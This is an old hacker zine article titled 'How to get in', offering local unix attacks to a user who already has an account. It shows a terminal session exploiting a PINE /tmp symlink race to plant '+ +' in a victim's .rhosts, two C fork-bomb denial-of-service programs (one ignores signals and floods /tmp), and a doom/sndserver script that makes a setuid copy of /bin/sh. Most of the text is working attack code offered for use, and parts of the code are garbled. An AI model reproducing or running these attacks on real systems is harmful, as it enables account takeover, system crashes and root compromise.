How to get in ... ================= By Control-Z Control_Z12@hotmail.com This issue presents some methods to attack from inside, when ya have an account on the system, without to have root privilegies. For most unix systems the most popular bug is an old pine bug. It works good on PINE 3.91 but is fixed on PINE 3.95. This very nice mail programm leaves a temporary logfile in /tmp with mode 666. This static file appears when there is an active pine session, and a new mail is in the INBOX. What is to do now. Ya watch the process with "ps aux" and it reveals what users use pine. Then ya create a symbolic link from that file. For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors and ya are in his account, and when he is a root ... kewl. ----------------------------------------------------------------------------- Another kewl class of attack from inside is to crash the system. The very classical method is the fork bomb: ------------------------------------ #include #include #include main() { switch (fork()) { case 0: setpgrp(); break; case -1: fprintf(stderr,"error: fork() failed\n"); exit(1); default: printf("Allocating all resources in background...\n"); _exit(0); } for(;;) { if (!fork()) setpgrp(); malloc((size_t)1); malloc((size_t)10); malloc((size_t)100); malloc((size_t)1000); malloc((size_t)10000); malloc((size_t)100000); malloc((size_t)1000000); } } ------------------------------------- or this one: ------------------------------------- /* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the bugtraq This program is a beefed up classic denial of service fork()'er :) Compilation: on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c on my linux, I can compile it with both -DBSD_C and -DSYSV_C if your not sure, you can experiment, or compile it without any -D'efines In the future: SunOS signals ignored. Creation of random symlinks for more gory destruction. Using advanced technology coding to make the hard drive blow up with a loud boom and the console explode causing a nuclear meltdown. Direct All Suggestions And Flames to: Vio NOTE: this program is provided for educational purposes only, its author will not take any responsibility for any stupid things you will decide to do. this has been tested, but not the latest version of it. .a&$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&a. $$' s `$' s `$ $ $ $ `$ $$ $$ $ $ $ $ $ $ $ $$ $$ $ $ p $ h $ e $ a $ r $ $a. $$ $$ $ssss$ $ $ $ $ $ $$$ $$ $$ $ $ $ $. $ ,$ $ $$$ $$ $$. $ ,$. $ ,$$. ,$$ .$ $$$ $$ `$$&@%o%@&$$$&@%o%@&$$$$$%o%$$$$.a$$$.a$$$$$$$$' */ #include #include #include #include #include #include #include #define MAX_FILELEN 100 /* The _actual_ max length */ #define MAX_DIRLEN 10 #define START_DIR "/tmp" /* This can be substituted for any directory */ /* that you have write access to */ void dirs_generator(void); main(int argc, char *argv[]) { int fp; char *buff; char chr; unlink(argv[0]); /* You might wanna ignore all the signals you can ignore.. */ signal(SIGINT, SIG_IGN); /* If any of the signals don't work */ signal(SIGHUP, SIG_IGN); /* on the system you are compiling */ signal(SIGTERM, SIG_IGN); /* them on, just erase that line */ signal(SIGALRM, SIG_IGN); signal(SIGBUS, SIG_IGN); signal(SIGFPE, SIG_IGN); signal(SIGILL, SIG_IGN); signal(SIGIOT, SIG_IGN); signal(SIGPIPE, SIG_IGN); signal(SIGQUIT, SIG_IGN); signal(SIGSEGV, SIG_IGN); signal(SIGTRAP, SIG_IGN); signal(SIGUSR1, SIG_IGN); signal(SIGUSR2, SIG_IGN); #ifdef BSD_C signal(SIGPROF, SIG_IGN); signal(SIGSTOP, SIG_IGN); signal(SIGTSTP, SIG_IGN); signal(SIGTTIN, SIG_IGN); signal(SIGTTOU, SIG_IGN); signal(SIGVTALRM, SIG_IGN); signal(SIGXCPU, SIG_IGN); signal(SIGXFSZ, SIG_IGN); #endif #ifdef SYSV_C signal(SIGPOLL, SIG_IGN); signal(SIGPWR, SIG_IGN); #endif if(fork()) { printf("Now crashing and blowing up this system.. have a nice day\n"); printf("You can safely logout, and let the proggie do its work\n"); printf("or you can stick around and watch lag go from 0 to bitch\n"); printf("in a matter of seconds\n"); printf(" --CoViN \n"); exit(0); } fp=open("/tmp/.foo",O_WRONLY|O_CREAT); if(fork()) { while(1) { fork(); buff = malloc(64000); write(fp, buff, 64000); system("uptime"); } } dirs_generator(); } void dirs_generator(void) { char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. "; char fl[MAX_FILELEN]; char dir[MAX_DIRLEN]; int i; int flen; printf("Making dirs..\n"); chdir(START_DIR); fork(); /* For the simplicity of the code.. we also want more dir's from */ fork(); /* the START_DIR */ fork(); while(1) { fork(); flen= (rand() % MAX_FILELEN) - 1; for(i=0; i .doomrc cat > /tmp/sndserver.c << EOF #include #include main() { if (fork()) while (getc(stdin)); else system("cp /bin/sh /tmp; chmod +s /tmp/sh"); /* or whatever you like to do */ } EOF gcc /tmp/sndserver.c -o /tmp/sndserver ------------ CUT HERE -------------- The fork() is just so that doom runs on nicely without locking up the keyboard and sndserver gobbles up all the sound data send to it. Run the script, start sdoom, quit the normal way, and execute /tmp/sh. -------------------------------------- If ya know some other, just send us...